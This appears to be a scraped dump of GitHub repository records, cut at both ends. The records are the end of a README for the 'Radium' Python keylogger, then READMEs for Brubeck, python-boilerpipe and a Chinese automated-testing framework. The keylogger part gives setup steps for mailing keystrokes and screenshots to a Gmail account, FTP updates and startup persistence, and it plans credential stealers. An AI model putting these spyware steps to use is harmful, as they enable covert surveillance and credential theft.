\\/| |__\n| | | |`--. \\ _ | | __ | __|\n| |_| /\\__/ / | | | |_\\ \\| |___\n \\___/\\____/\\_| |_/\\____/\\____/\n____ ____ ____ ____ ____\n\n--> Download the libraries if you are missing any.\n--> Set the Gmail username and password and remember to check allow connection from less secure apps in gmail settings.\n--> Set the FTP server. Make the folder Radium in which you'll store the new version of exe.\n--> Set the FTP ip, username, password.\n--> Remember to encode the password in base64.\n--> Set the originalfilename variable in copytostartup(). This should be equal to the name of the exe.\n--> Make the exe using Pyinstaller\n--> Keylogs will be mailed after every 300 key strokes. This can be changed.\n--> Screenshot is taken after every 500 key strokes. This can be changed.\n--> Remember: If you make this into exe, change the variable \"originalfilename\" and \"coppiedfilename\" in function copytostartup().\n--> Remember: whatever name you give to \"coppiedfilename\", should be given to checkfilename in deleteoldstub().\n\n____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____\n _____ _ _ _ _\n|_ _| | (_) | | | |\n | | | |__ _ _ __ __ _ ___ | |_ ___ __ _____ _ __| | __ ___ _ __\n | | | '_ \\| | '_ \\ / _` / __| | __/ _ \\ \\ \\ /\\ / / _ \\| '__| |/ / / _ \\| '_ \\\n | | | | | | | | | | (_| \\__ \\ | || (_) | \\ V V / (_) | | | < | (_) | | | |\n \\_/ |_| |_|_|_| |_|\\__, |___/ \\__\\___/ \\_/\\_/ \\___/|_| |_|\\_\\ \\___/|_| |_|\n __/ |\n |___/\n____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____\n\n--> Persistance\n--> Taking screenshots after a specific time. Making it keystrokes independent.\n--> Webcam logging\n--> Skype chat history stealer\n--> Steam credential harvestor\n```\n# Requirements\n* Install [PyHook](https://sourceforge.net/projects/pyhook/)\n* Install [PyWin32](https://sourceforge.net/projects/pywin32/)\n* Install [Microsoft Visual C++ Compiler for Python](https://www.microsoft.com/en-us/download/details.aspx?id=44266)\n* Install [PyInstaller](http://www.pyinstaller.org/)\n\n# Tutorial\n[![Tutorial Radium Keylogger](https://i.imgur.com/Y1jE9Km.png)](https://youtu.be/T0h_427L8u4)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "j2labs/brubeck", "link": "https://github.com/j2labs/brubeck", "tags": [], "stars": 513, "description": "Asynchronous web and messaging", "lang": "Python", "repo_lang": "", "readme": "# What Is Brubeck?\n\n__Brubeck__ is no longer actively maintained.\n", "readme_type": "markdown", "hn_comments": "As somebody who's been quite happily building a system around Brubeck for the better part of two months now, it's nice to see the background story pieced together into a cogent storyline.What's more interesting, I think, is the insight into the thought process and background that goes into building something that is exquisitely elegant in its simplicity and at the same time incredibly powerful and flexible.Working with Brubeck has been a delight since the very beginning. Granted I've had experience building MVC type systems before, including in Python, but I think Brubeck's ease-of-use is quite significant compared to other frameworks.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "misja/python-boilerpipe", "link": "https://github.com/misja/python-boilerpipe", "tags": [], "stars": 513, "description": "Python interface to Boilerpipe, Boilerplate Removal and Fulltext Extraction from HTML pages", "lang": "Python", "repo_lang": "", "readme": "# python-boilerpipe\n\n\nA python wrapper for [Boilerpipe](http://code.google.com/p/boilerpipe/), an excellent Java library for boilerplate removal and fulltext extraction from HTML pages.\n\n## Configuration\n\n\nDependencies:\n\n * jpype\n * chardet\n\nThe boilerpipe jar files will get fetched and included automatically when building the package.\n\n## Installation\n\nCheckout the code:\n\n\tgit clone https://github.com/misja/python-boilerpipe.git\n\tcd python-boilerpipe\n\n\n**virtualenv**\n\n\tvirtualenv env\n\tsource env/bin/activate\n pip install -r requirements.txt\n\tpython setup.py install\n\t\n\n**Fedora**\n\n sudo dnf install -y python2-jpype\n sudo python setup.py install\n\n\n## Usage\n\n\nBe sure to have set `JAVA_HOME` properly since `jpype` depends on this setting.\n\nThe constructor takes a keyword argument `extractor`, being one of the available boilerpipe extractor types:\n\n - DefaultExtractor\n - ArticleExtractor\n - ArticleSentencesExtractor\n - KeepEverythingExtractor\n - KeepEverythingWithMinKWordsExtractor\n - LargestContentExtractor\n - NumWordsRulesExtractor\n - CanolaExtractor\n\nIf no extractor is passed the DefaultExtractor will be used by default. Additional keyword arguments are either `html` for HTML text or `url`.\n\n from boilerpipe.extract import Extractor\n extractor = Extractor(extractor='ArticleExtractor', url=your_url)\n\nThen, to extract relevant content:\n\n extracted_text = extractor.getText()\n\n extracted_html = extractor.getHTML()\n\n\nFor `KeepEverythingWithMinKWordsExtractor` we have to specify `kMin` parameter, which defaults to `1` for now:\n\n\textractor = Extractor(extractor='KeepEverythingWithMinKWordsExtractor', url=your_url, kMin=20)\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "yanchunhuo/AutomationTest", "link": "https://github.com/yanchunhuo/AutomationTest", "tags": ["automated-testing", "selenium", "appium", "autotesting", "dubbo"], "stars": 514, "description": "\u81ea\u52a8\u5316\u6d4b\u8bd5\u6846\u67b6\uff0c\u652f\u6301\u63a5\u53e3\u81ea\u52a8\u5316\u3001WEB UI\u81ea\u52a8\u5316\u3001APP UI\u81ea\u52a8\u5316\u3001\u6027\u80fd\u6d4b\u8bd5\uff1b\u652f\u6301\u591a\u7cfb\u7edf\u76f8\u4e92\u8c03\u7528\uff1b\u652f\u6301\u63a5\u53e3\u4e0eUI\u76f8\u4e92\u8c03\u7528\uff1b\u652f\u6301dubbo\u63a5\u53e3\u8c03\u7528", "lang": "Python", "repo_lang": "", "readme": "![avatar](https://github.com/yanchunhuo/resources/blob/master/APIAutomationTest/report.png)\n\n# [\u81ea\u52a8\u5316\u6d4b\u8bd5]()\n\n# [\u6982\u51b5]()\n* \u672c\u9879\u76ee\u652f\u6301\u63a5\u53e3\u81ea\u52a8\u5316\u6d4b\u8bd5\u3001app ui\u81ea\u52a8\u5316\u6d4b\u8bd5\u3001web ui\u81ea\u52a8\u5316\u6d4b\u8bd5\u3001\u6027\u80fd\u6d4b\u8bd5\n* \u672c\u9879\u76ee\u7531\u4ee5\u4e0b\u5de5\u5177\u7ec4\u6210\n * pytest\uff1apython\u7684\u4e00\u4e2a\u5355\u5143\u6d4b\u8bd5\u6846\u67b6,https://docs.pytest.org/en/latest/\n * pytest-xdist\uff1apytest\u7684\u4e00\u4e2a\u63d2\u4ef6,\u53ef\u591a\u8fdb\u7a0b\u540c\u65f6\u6267\u884c\u6d4b\u8bd5\u7528\u4f8b,https://github.com/pytest-dev/pytest-xdist\n * allure-pytest\uff1a\u7528\u4e8e\u751f\u6210\u6d4b\u8bd5\u62a5\u544a,http://allure.qatools.ru/\n * PyHamcrest\uff1a\u4e00\u4e2a\u5339\u914d\u5668\u5bf9\u8c61\u7684\u6846\u67b6\uff0c\u7528\u4e8e\u65ad\u8a00\uff0chttps://github.com/hamcrest/PyHamcrest\n * requests\uff1ahttp\u8bf7\u6c42\u6846\u67b6,http://docs.python-requests.org/en/master/\n * Appium\uff1a\u79fb\u52a8\u7aef\u7684\u81ea\u52a8\u5316\u6d4b\u8bd5\u6846\u67b6,https://github.com/appium/appium/tree/v1.15.1\n * selenium\uff1aweb ui\u81ea\u52a8\u5316\u6d4b\u8bd5\u6846\u67b6,https://www.seleniumhq.org/\n * cx_Oracle\uff1aoracle\u64cd\u4f5c\u5e93,https://cx-oracle.readthedocs.io/en/latest/index.html\n * JPype1\uff1a\u7528\u4e8e\u6267\u884cjava\u4ee3\u7801,https://github.com/jpype-project/jpype\n * paramiko\uff1assh\u5ba2\u6237\u7aef,https://docs.paramiko.org/en/stable/\n * Pillow\uff1a\u7528\u4e8e\u56fe\u7247\u5904\u7406,https://pillow.readthedocs.io/en/latest/\n * PyMySQL\uff1a\u7528\u4e8e\u64cd\u4f5cMySQL\u6570\u636e\u5e93,https://github.com/PyMySQL/PyMySQL\n * redis\uff1aredis\u5ba2\u6237\u7aef,https://pypi.org/project/redis/\n * tess4j\uff1ajava\u7684\u56fe\u7247\u8bc6\u522b\u5de5\u5177,https://github.com/nguyenq/tess4j/\n * allpairspy: \u7528\u4e8e\u5c06\u53c2\u6570\u5217\u8868\u8fdb\u884c\u6b63\u4ea4\u5206\u6790\uff0c\u5b9e\u73b0\u6b63\u4ea4\u5206\u6790\u6cd5\u7528\u4f8b\u8986\u76d6\uff0chttps://pypi.org/project/allpairspy/\n * python-binary-memcached\uff1a\u7528\u4e8e\u64cd\u4f5cmemcached\uff0chttps://github.com/jaysonsantos/python-binary-memcached\n * kazoo\uff1a\u7528\u4e8e\u64cd\u4f5czookeeper\uff0chttps://github.com/python-zk/kazoo\n * websockets\uff1a\u7528\u4e8ewebsocket\u8bf7\u6c42\uff0chttps://github.com/aaugustin/websockets\n * Js2Py\uff1a\u7528\u4e8e\u6267\u884cjs\u4ee3\u7801\uff0chttps://github.com/PiotrDabkowski/Js2Py\n * sqlacodegen\uff1a\u7528\u4e8e\u6839\u636e\u6570\u636e\u5e93\u8868\u7ed3\u6784\u751f\u6210python\u5bf9\u8c61\uff0chttps://github.com/agronholm/sqlacodegen\n * SQLAlchemy\uff1aSQL\u5de5\u5177\u5305\u53ca\u5bf9\u8c61\u5173\u7cfb\u6620\u5c04\uff08ORM\uff09\u5de5\u5177\uff0chttps://github.com/sqlalchemy/sqlalchemy\n* \u5f53\u524d\u4ec5\u652f\u6301Python>=3.6\n* \u9879\u76ee\u5982\u9700\u6267\u884cjava\u4ee3\u7801(\u5373\u4f7f\u7528jpype1)\uff0c\u5219\u9879\u76ee\u76ee\u5f55\u6240\u5728\u7684\u8def\u5f84\u4e0d\u53ef\u5305\u542b\u4e2d\u6587\n \n# [\u4f7f\u7528]()\n## \u4e00\u3001\u73af\u5883\u51c6\u5907\n### 1\u3001\u811a\u672c\u8fd0\u884c\u73af\u5883\u51c6\u5907\n#### 1.1\u3001\u5b89\u88c5\u7cfb\u7edf\u4f9d\u8d56\n* Linux-Ubuntu:\n * apt-get install libpq-dev python3-dev \u3010\u7528\u4e8epsycopg2-binary\u6240\u9700\u4f9d\u8d56\u3011\n * apt-get install g++ libgraphicsmagick++1-dev libboost-python-dev \u3010\u7528\u4e8epgmagick\u6240\u9700\u4f9d\u8d56\u3011\n * apt-get install python-pgmagick \u3010pgmagick\u6240\u9700\u4f9d\u8d56\u3011\n* Linux-CentOS:\n * yum install python3-devel postgresql-devel \u3010\u7528\u4e8epsycopg2-binary\u6240\u9700\u4f9d\u8d56\u3011\n * yum install GraphicsMagick-c++-devel boost boost-devel\u3010\u7528\u4e8epgmagick\u6240\u9700\u4f9d\u8d56\u3011\n* Windows:\n * \u5b89\u88c5Microsoft Visual C++ 2019 Redistributable\uff0c\u4e0b\u8f7d\u5730\u5740\uff1ahttps://visualstudio.microsoft.com/zh-hans/downloads/ \u3010jpype1\u3001\u56fe\u50cf\u8bc6\u522b\u5b57\u5e93\u6240\u9700\u4f9d\u8d56\u3011\n\n#### 1.2\u3001\u5b89\u88c5python\u4f9d\u8d56\u6a21\u5757\n* pip3 install -r requirements.txt\n* \u5b89\u88c5pgmagick\n * Linux:\n * pip3 install pgmagick==0.7.6\n * Windows:\n * \u4e0b\u8f7d\u5b89\u88c5\u5bf9\u5e94\u7248\u672c\uff1ahttps://www.lfd.uci.edu/~gohlke/pythonlibs/#pgmagick\n* \u5b89\u88c5xmind-sdk-python\n * \u4e0b\u8f7d\u5730\u5740:https://github.com/xmindltd/xmind-sdk-python\n\n#### 1.3\u3001\u5b89\u88c5allure\n* \u6e90\u5b89\u88c5\n * sudo apt-add-repository ppa:qameta/allure\n * sudo apt-get update \n * sudo apt-get install allure\n * \u5176\u4ed6\u5b89\u88c5\u65b9\u5f0f\uff1ahttps://github.com/allure-framework/allure2\n* \u624b\u52a8\u5b89\u88c5\n * \u4e0b\u8f7d2.7.0\u7248\u672c:https://github.com/allure-framework/allure2/releases\n * \u89e3\u538ballure-2.7.0.zip\n * \u52a0\u5165\u7cfb\u7edf\u73af\u5883\u53d8\u91cf:export PATH=/home/john/allure-2.7.0/bin:$PATH\n\n#### 1.4\u3001\u5b89\u88c5openjdk8\u6216jdk8\n* sudo add-apt-repository ppa:openjdk-r/ppa\n* sudo apt-get update\n* sudo apt-get install openjdk-8-jdk\n\n#### 1.5\u3001\u5b89\u88c5maven\n* \u5b8c\u6210maven\u7684\u5b89\u88c5\u914d\u7f6e\n\n#### 1.6\u3001\u5b89\u88c5Oracle Instant Client\n* Linux\n * \u5b89\u88c5libaio\u5305\n * Linux-CentOS:yum install libaio\n * Linux-Ubuntu:apt-get install libaio1\n * \u914d\u7f6eOracle Instant Client\n * \u4e0b\u8f7d\u5730\u5740:http://www.oracle.com/technetwork/topics/linuxx86-64soft-092277.html\n * \u4e0b\u8f7d\u5b89\u88c5\u5305instantclient-basic-linux.x64-18.3.0.0.0dbru.zip\n * \u89e3\u538bzip\u5305,\u5e76\u914d\u7f6e/etc/profile\n * unzip instantclient-basic-linux.x64-18.3.0.0.0dbru.zip\n * export LD_LIBRARY_PATH=/home/john/oracle_instant_client/instantclient_18_3:$LD_LIBRARY_PATH\n * \u4e2d\u6587\u7f16\u7801\u8bbe\u7f6e\n \n ```python \n import os\n os.environ['NLS_LANG'] = 'SIMPLIFIED CHINESE_CHINA.UTF8'\n ```\n* Windows\n * \u4e0b\u8f7d\u5730\u5740:http://www.oracle.com/technetwork/topics/winx64soft-089540.html\n * \u4e0b\u8f7d\u5b89\u88c5\u5305instantclient-basic-windows.x64-11.2.0.4.0.zip\n * \u89e3\u538bzip\u5305,\u5e76\u914d\u7f6e\u73af\u5883\u53d8\u91cf\n * \u7cfb\u7edf\u73af\u5883\u53d8\u91cf\u52a0\u5165D:\\instantclient-basic-windows.x64-11.2.0.4.0\\instantclient_11_2\n * \u914d\u7f6e\u4e2d\u6587\u7f16\u7801,\u73af\u5883\u53d8\u91cf\u521b\u5efaNLS_LANG=SIMPLIFIED CHINESE_CHINA.UTF8 \n * \u6ce8\u610f:\u5982\u679c\u4f7f\u752864\u4f4d,python\u548cinstantclient\u90fd\u9700\u8981\u4f7f\u752864\u4f4d\n\n#### 1.7\u3001\u56fe\u50cf\u8bc6\u522b\u5b57\u5e93\u51c6\u5907\n* \u4e0b\u8f7d\u5bf9\u5e94\u5b57\u5e93:https://github.com/tesseract-ocr/tessdata\n* \u5c06\u4e0b\u8f7d\u7684\u5b57\u5e93\u653e\u5230common/java/lib/tess4j/tessdata/\n* Linux\n * \u5b89\u88c5\u4f9d\u8d56\n * Linux-Ubuntu:sudo apt install pkg-config aclocal libtool automake libleptonica-dev\n * Linux-CentOS:yum install autoconf automake libtool libjpeg-devel libpng-devel libtiff-devel zlib-devel\n * \u5b89\u88c5leptonica\uff0c\u4e0b\u8f7dleptonica-1.78.0.tar.gz\uff0c\u4e0b\u8f7d\u5730\u5740\uff1ahttps://github.com/DanBloomberg/leptonica/releases\n * \u5b89\u88c5\u6b65\u9aa4\u540ctesseract-ocr\u7684\u5b89\u88c5\n * \u4fee\u6539/etc/profile\u6dfb\u52a0\u5982\u4e0b\u5185\u5bb9\uff0c\u7136\u540esource\n ```\n export LD_LIBRARY_PATH=$LD_LIBRARY_PAYT:/usr/local/lib\n export LIBLEPT_HEADERSDIR=/usr/local/include\n export PKG_CONFIG_PATH=/usr/local/lib/pkgconfig\n ```\n * \u5b89\u88c5tesseract-ocr\uff0c\u4e0b\u8f7dtesseract-4.1.1.tar.gz\uff0c\u4e0b\u8f7d\u5730\u5740\uff1ahttps://github.com/tesseract-ocr/tesseract/releases\n * ./autogen.sh\n * ./configure\n * sudo make\n * sudo make install\n * sudo ldconfig\n* Windows\n * \u5b89\u88c5Microsoft Visual C++ 2019 Redistributable\uff0c\u4e0b\u8f7d\u5730\u5740\uff1ahttps://visualstudio.microsoft.com/zh-hans/downloads/\n\n### 2\u3001selenium server\u8fd0\u884c\u73af\u5883\u51c6\u5907\n#### 2.1\u3001\u5b89\u88c5jdk1.8,\u5e76\u914d\u7f6e\u73af\u5883\u53d8\u91cf\n* export JAVA_HOME=/usr/lib/jvm/jdk8\n* export JRE_HOME=${JAVA_HOME}/jre \n* export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib\n* export PATH=${JAVA_HOME}/bin:$PATH\n\n#### 2.2\u3001\u5b89\u88c5\u914d\u7f6eselenium\n* \u914d\u7f6eselenium server\n * \u4e0b\u8f7dselenium-server-standalone-3.141.0.jar\n * \u4e0b\u8f7d\u5730\u5740:http://selenium-release.storage.googleapis.com/index.html\n * \u4ee5\u7ba1\u7406\u5458\u8eab\u4efd\u542f\u52a8\u670d\u52a1:java -jar selenium-server-standalone-3.141.0.jar -log selenium.log\n* \u4e0b\u8f7d\u6d4f\u89c8\u5668\u9a71\u52a8\n * \u8c37\u6b4c\u6d4f\u89c8\u5668\uff1ahttps://chromedriver.storage.googleapis.com/index.html\n * \u9a71\u52a8\u652f\u6301\u7684\u6700\u4f4e\u6d4f\u89c8\u5668\u7248\u672c\uff1ahttps://raw.githubusercontent.com/appium/appium-chromedriver/master/config/mapping.json\n * \u706b\u72d0\u6d4f\u89c8\u5668\uff1ahttps://github.com/mozilla/geckodriver/\n * \u9a71\u52a8\u652f\u6301\u7684\u6d4f\u89c8\u5668\u7248\u672c\uff1ahttps://firefox-source-docs.mozilla.org/testing/geckodriver/geckodriver/Support.html\n * IE\u6d4f\u89c8\u5668(\u5efa\u8bae\u4f7f\u752832\u4f4d,64\u4f4d\u64cd\u4f5c\u6781\u6162)\uff1ahttp://selenium-release.storage.googleapis.com/index.html\n * \u5c06\u9a71\u52a8\u6240\u5728\u76ee\u5f55\u52a0\u5165\u5230selenium server\u670d\u52a1\u5668\u7cfb\u7edf\u73af\u5883\u53d8\u91cf:export PATH=/home/john/selenium/:$PATH\n* IE\u6d4f\u89c8\u5668\u8bbe\u7f6e\n * \u5728Windows Vista\u3001Windows7\u7cfb\u7edf\u4e0a\u7684IE\u6d4f\u89c8\u5668\u5728IE7\u53ca\u4ee5\u4e0a\u7248\u672c\u4e2d\uff0c\u9700\u8981\u8bbe\u7f6e\u56db\u4e2a\u533a\u57df\u7684\u4fdd\u62a4\u6a21\u5f0f\u4e3a\u4e00\u6837\uff0c\u8bbe\u7f6e\u5f00\u542f\u6216\u8005\u5173\u95ed\u90fd\u53ef\u4ee5\u3002\n * \u5de5\u5177-->Internet\u9009\u9879-->\u5b89\u5168\n * IE10\u53ca\u4ee5\u4e0a\u7248\u672c\u589e\u5f3a\u4fdd\u62a4\u6a21\u5f0f\u9700\u8981\u5173\u95ed\u3002\n * \u5de5\u5177-->Internet\u9009\u9879-->\u9ad8\u7ea7\n * \u6d4f\u89c8\u5668\u7f29\u653e\u7ea7\u522b\u5fc5\u987b\u8bbe\u7f6e\u4e3a100%\uff0c\u4ee5\u4fbf\u672c\u5730\u9f20\u6807\u4e8b\u4ef6\u53ef\u4ee5\u8bbe\u7f6e\u4e3a\u6b63\u786e\u7684\u5750\u6807\u3002\n * \u9488\u5bf9IE11\u9700\u8981\u8bbe\u7f6e\u6ce8\u518c\u8868\u4ee5\u4fbf\u4e8e\u6d4f\u89c8\u5668\u9a71\u52a8\u4e0e\u6d4f\u89c8\u5668\u5efa\u7acb\u8fde\u63a5\n * Windows 64\u4f4d\uff1aHKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_BFCACHE\n * Windows 32\u4f4d\uff1aHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_BFCACHE\n * \u5982\u679cFEATRUE_BFCACHE\u9879\u4e0d\u5b58\u5728\uff0c\u9700\u8981\u521b\u5efa\u4e00\u4e2a\uff0c\u7136\u540e\u5728\u91cc\u9762\u521b\u5efa\u4e00\u4e2aDWORD(32\u4f4d)\uff0c\u547d\u540d\u4e3aiexplore.exe\uff0c\u503c\u4e3a0\n * Windows 64\u4f4d\u4e24\u4e2a\u6ce8\u518c\u8868\u5efa\u8bae\u90fd\u8bbe\u7f6e\n * IE8\u53ca\u4ee5\u4e0a\u7248\u672c\u8bbe\u7f6e\u652f\u6301inprivate\u6a21\u5f0f\uff0c\u4ee5\u4fbf\u591a\u5f00IE\u7a97\u53e3\u65f6cookies\u80fd\u591f\u72ec\u4eab\n * HKKY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main \u4e0b\u5efa\u4e00\u4e2a\u540d\u4e3aTabProcGrowth\u7684DWORD(32\u4f4d)\uff0c\u503c\u4e3a0\n * \u91cd\u542f\u7cfb\u7edf\n * \u6ce8:https://github.com/SeleniumHQ/selenium/wiki/InternetExplorerDriver#required-configuration\n\n### 3\u3001appium server\u8fd0\u884c\u73af\u5883\u51c6\u5907\n#### 3.1\u3001\u5b89\u88c5jdk1.8,\u5e76\u914d\u7f6e\u73af\u5883\u53d8\u91cf\n* export JAVA_HOME=/usr/lib/jvm/jdk8\n* export JRE_HOME=${JAVA_HOME}/jre \n* export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib\n* export PATH=${JAVA_HOME}/bin:$PATH\n\n#### 3.2\u3001\u5b89\u88c5\u914d\u7f6eappium server\n* \u5b89\u88c5appium desktop server\n * \u4e0b\u8f7dAppium-windows-1.15.1.exe\n * \u4e0b\u8f7d\u5730\u5740:https://github.com/appium/appium-desktop/releases\n * \u4ee5\u7ba1\u7406\u5458\u8eab\u4efd\u542f\u52a8\u670d\u52a1\n\n* Android\u73af\u5883\u51c6\u5907\n * \u5b89\u88c5java(JDK),\u5e76\u914d\u7f6eJAVA_HOME=/usr/lib/jvm/jdk8\n * \u5b89\u88c5Android SDK,\u5e76\u914d\u7f6eANDROID_HOME=\"/usr/local/adt/sdk\"\n * \u4f7f\u7528SDK manager\u5b89\u88c5\u9700\u8981\u8fdb\u884c\u81ea\u52a8\u5316\u7684Android API\u7248\u672c\n \n* IOS\u73af\u5883\u51c6\u5907\n * \u7531\u4e8e\u6d4b\u8bd5IOS\u771f\u5b9e\u8bbe\u5907\u6ca1\u529e\u6cd5\u76f4\u63a5\u64cd\u4f5cweb view\uff0c\u9700\u8981\u901a\u8fc7usb\uff0c\u5b9e\u73b0\u901a\u8fc7usb\u521b\u5efa\u8fde\u63a5\u9700\u8981\u5b89\u88c5ios-webkit-debug-proxy\n * \u4e0b\u8f7d\u5b89\u88c5\u5730\u5740\uff1ahttps://github.com/google/ios-webkit-debug-proxy/tree/v1.8.5\n\n* \u624b\u673achrome\u73af\u5883\u51c6\u5907\n * \u786e\u4fdd\u624b\u673a\u5df2\u5b89\u88c5chrome\u6d4f\u89c8\u5668\n * \u4e0b\u8f7dchrome\u6d4f\u89c8\u5668\u9a71\u52a8\uff1ahttps://chromedriver.storage.googleapis.com/index.html\n * \u9a71\u52a8\u652f\u6301\u7684\u6700\u4f4e\u6d4f\u89c8\u5668\u7248\u672c\uff1ahttps://raw.githubusercontent.com/appium/appium-chromedriver/master/config/mapping.json\n * \u5728appium desktop\u4e0a\u8bbe\u7f6e\u9a71\u52a8\u7684\u8def\u5f84\n\n* \u6df7\u5408\u5e94\u7528\u73af\u5883\u51c6\u5907\n * \u65b9\u6cd5\u4e00\uff1a\u5b89\u88c5TBS Studio\u5de5\u5177\u67e5\u770bwebview\u5185\u6838\u7248\u672c\uff1ahttps://x5.tencent.com/tbs/guide/debug/season1.html\n * \u65b9\u6cd5\u4e8c\uff1a\u6253\u5f00\u5730\u5740\uff08\u8be5\u5730\u5740\u5728uc\u5f00\u53d1\u5de5\u5177\u4e2d\u53ef\u67e5\u5230\uff09\u67e5\u770bwebview\u5185\u6838\u7248\u672c\uff1ahttps://liulanmi.com/labs/core.html\n * \u4e0b\u8f7dwebview\u5185\u6838\u5bf9\u5e94\u7684chromedriver\u7248\u672c\uff1ahttps://chromedriver.storage.googleapis.com/index.html\n * \u914d\u7f6e\u6587\u4ef6\u8fdb\u884c\u9a71\u52a8\u8def\u5f84\u7684\u914d\u7f6e\n * \u6ce8\uff1awebview\u9700\u8981\u5f00\u542fdebug\u6a21\u5f0f\n\n* Windows\u73af\u5883\u51c6\u5907\n * \u652f\u6301Windows10\u53ca\u4ee5\u4e0a\u7248\u672c\n * \u8bbe\u7f6eWindows\u5904\u4e8e\u5f00\u53d1\u8005\u6a21\u5f0f\n * \u4e0b\u8f7dWinAppDriver\u5e76\u5b89\u88c5(V1.1\u7248\u672c),https://github.com/Microsoft/WinAppDriver/releases\n * \\[\u53ef\u9009\\]\u4e0b\u8f7d\u5b89\u88c5WindowsSDK,\u5728Windows Kits\\10\\bin\\10.0.17763.0\\x64\u5185\u5305\u542b\u6709inspect.exe\u7528\u4e8e\u5b9a\u4f4dWindows\u7a0b\u5e8f\u7684\u5143\u7d20\u4fe1\u606f\n\n* \u5176\u4ed6\u66f4\u591a\u914d\u7f6e\uff1ahttps://github.com/appium/appium/tree/v1.15.1/docs/en/drivers\n\n## \u4e8c\u3001\u4fee\u6539\u914d\u7f6e\n* vim config/app_ui_config.conf \u914d\u7f6eapp ui\u81ea\u52a8\u5316\u7684\u6d4b\u8bd5\u4fe1\u606f\n* vim config/web_ui_config.conf \u914d\u7f6eweb ui\u81ea\u52a8\u5316\u7684\u6d4b\u8bd5\u4fe1\u606f\n* vim config/projectName/projectName.conf \u914d\u7f6e\u6d4b\u8bd5\u9879\u76ee\u7684\u4fe1\u606f\n* \u4fee\u6539\u6027\u80fd\u6d4b\u8bd5\u8d1f\u8f7d\u673a\u7684\u7cfb\u7edf\u6700\u5927\u6253\u5f00\u6587\u4ef6\u6570,\u907f\u514d\u5e76\u53d1\u7528\u6237\u6570\u5927\u4e8e\u6700\u5927\u6253\u5f00\u6587\u4ef6\u6570\n\n## \u4e09\u3001\u8fd0\u884c\u6d4b\u8bd5\n### 1\u3001API\u6d4b\u8bd5\n* cd AutomationTest/\n* python3 -u run_api_test.py --help\n* python3 -u run_api_test.py \u8fd0\u884ccases/api/\u76ee\u5f55\u6240\u6709\u7684\u7528\u4f8b\n* python3 -u run_api_test.py -k keyword \u8fd0\u884c\u5339\u914d\u5173\u952e\u5b57\u7684\u7528\u4f8b\uff0c\u4f1a\u5339\u914d\u6587\u4ef6\u540d\u3001\u7c7b\u540d\u3001\u65b9\u6cd5\u540d\n* python3 -u run_api_test.py -d dir \u8fd0\u884c\u6307\u5b9a\u76ee\u5f55\u7684\u7528\u4f8b\uff0c\u9ed8\u8ba4\u8fd0\u884ccases/api/\u76ee\u5f55\n* python3 -u run_api_test.py -m mark \u8fd0\u884c\u6307\u5b9a\u6807\u8bb0\u7684\u7528\u4f8b\n\n### 2\u3001web ui\u6d4b\u8bd5\n* cd AutomationTest/\n* python3 -u run_web_ui_test.py --help\n* python3 -u run_web_ui_test.py \u8fd0\u884ccases/web_ui/\u76ee\u5f55\u6240\u6709\u7684\u7528\u4f8b\n* python3 -u run_web_ui_test.py -k keyword \u8fd0\u884c\u5339\u914d\u5173\u952e\u5b57\u7684\u7528\u4f8b\uff0c\u4f1a\u5339\u914d\u6587\u4ef6\u540d\u3001\u7c7b\u540d\u3001\u65b9\u6cd5\u540d\n* python3 -u run_web_ui_test.py -d dir \u8fd0\u884c\u6307\u5b9a\u76ee\u5f55\u7684\u7528\u4f8b\uff0c\u9ed8\u8ba4\u8fd0\u884ccases/web_ui/\u76ee\u5f55\n* python3 -u run_web_ui_test.py -m mark \u8fd0\u884c\u6307\u5b9a\u6807\u8bb0\u7684\u7528\u4f8b\n\n### 3\u3001app ui\u6d4b\u8bd5\n* cd AutomationTest/\n* python3 -u run_app_ui_test.py --help\n* python3 -u run_app_ui_test.py \u8fd0\u884ccases/app_ui/\u76ee\u5f55\u6240\u6709\u7684\u7528\u4f8b\n* python3 -u run_app_ui_test.py -tt phone -k keyword \u8fd0\u884c\u5339\u914d\u5173\u952e\u5b57\u7684\u7528\u4f8b\uff0c\u4f1a\u5339\u914d\u6587\u4ef6\u540d\u3001\u7c7b\u540d\u3001\u65b9\u6cd5\u540d\n* python3 -u run_app_ui_test.py -tt phone -d dir \u8fd0\u884c\u6307\u5b9a\u76ee\u5f55\u7684\u7528\u4f8b\uff0c\u9ed8\u8ba4\u8fd0\u884ccases/app_ui/\u76ee\u5f55\n* python3 -u run_app_ui_test.py -m mark \u8fd0\u884c\u6307\u5b9a\u6807\u8bb0\u7684\u7528\u4f8b\n\n### 4\u3001\u6027\u80fd\u6d4b\u8bd5\n* cd AutomationTest/\n* ./start_locust_master.sh\n* ./start_locust_slave.sh\n\n## \u56db\u3001\u751f\u6210\u6d4b\u8bd5\u62a5\u544a\n### 1\u3001API\u6d4b\u8bd5\n* cd AutomationTest/\n* python3 -u generate_api_test_report.py -p 9080 \n* \u8bbf\u95ee\u5730\u5740http://ip:9080\n* \u5728\u4f7f\u7528Ubuntu\u8fdb\u884c\u62a5\u544a\u751f\u6210\u65f6\uff0c\u8bf7\u52ff\u4f7f\u7528sudo\u6743\u9650\uff0c\u5426\u5219\u65e0\u6cd5\u751f\u6210\uff0callure\u4e0d\u652f\u6301\n\n### 2\u3001web ui\u6d4b\u8bd5\n* cd AutomationTest/\n* python3 -u generateReport_web_ui_test_report.py -ieport 9081 -chromeport 9082 -firefoxport 9083\n* \u8bbf\u95ee\u5730\u5740http://ip:908[1-3]\n* \u5728\u4f7f\u7528Ubuntu\u8fdb\u884c\u62a5\u544a\u751f\u6210\u65f6\uff0c\u8bf7\u52ff\u4f7f\u7528sudo\u6743\u9650\uff0c\u5426\u5219\u65e0\u6cd5\u751f\u6210\uff0callure\u4e0d\u652f\u6301\n\n### 3\u3001app ui\u6d4b\u8bd5\n* cd AutomationTest/\n* python3 -u 